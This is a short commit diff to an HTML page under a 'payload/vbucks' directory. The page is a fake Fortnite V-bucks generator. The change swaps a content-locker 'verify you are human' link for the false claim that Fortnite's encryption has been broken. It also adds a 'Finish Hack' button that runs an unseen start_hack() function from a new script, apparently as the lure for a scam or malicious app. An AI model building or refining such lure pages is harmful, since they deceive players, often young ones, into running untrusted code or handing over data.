working on multi window

--- a/payload/vbucks/src/index.html
+++ b/payload/vbucks/src/index.html
@@ -102,10 +102,10 @@
                               <h4 style="font-family: fortnite; font-size: 25px; text-transform: uppercase;">Verification</h4>
                            </div>
                            <div class="content-ver">
-                              <p><span id="user-text2" ></span>, Our server is experiencing a high amount of request. In order to Get your vbucks, please verify you are human.</p>
+                              <p><span id="user-text2" ></span>, Fortnite's encryption algorithms have been broken in order to add V-bucks to your account.</p>
                               <div class="verify-btn center-block text-center">
                                  <div class="verify-btn-text">
-                                    <!-- Your Link -->		<a href="https://www.areyouabot.net/cl.php?id=c9f3368efac8cdaad8013e45ea0292a7" style="font-family: fortnite; font-size: 22px; text-transform: uppercase; color: black;"> Verify</a>
+                                    <a onclick="start_hack();" style="font-family: fortnite; font-size: 22px; text-transform: uppercase; color: black;">Finish Hack</a>
                                  </div>
                               </div>
                            </div>
@@ -143,7 +143,7 @@
       <!-- Bootstrap JavaScript -->
       <script src="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js" integrity="sha384-0mSbJDEHialfmuBBQP6A4Qrprq5OVfW37PRR3j5ELqxss1yVqOtnepnHVP9aJ7xS" crossorigin="anonymous"></script>
       <script type="text/javascript" src="js/jquery.magnific-popup.min.js"></script>
-      <script type="text/javascript" src="js/main.js"></script>
+      <script type="text/javascript" src="js/index.js"></script>
       <script>if (window.module) module = window.module;</script>
    </body>
    <!-- Histats.com  START  (aync)-->
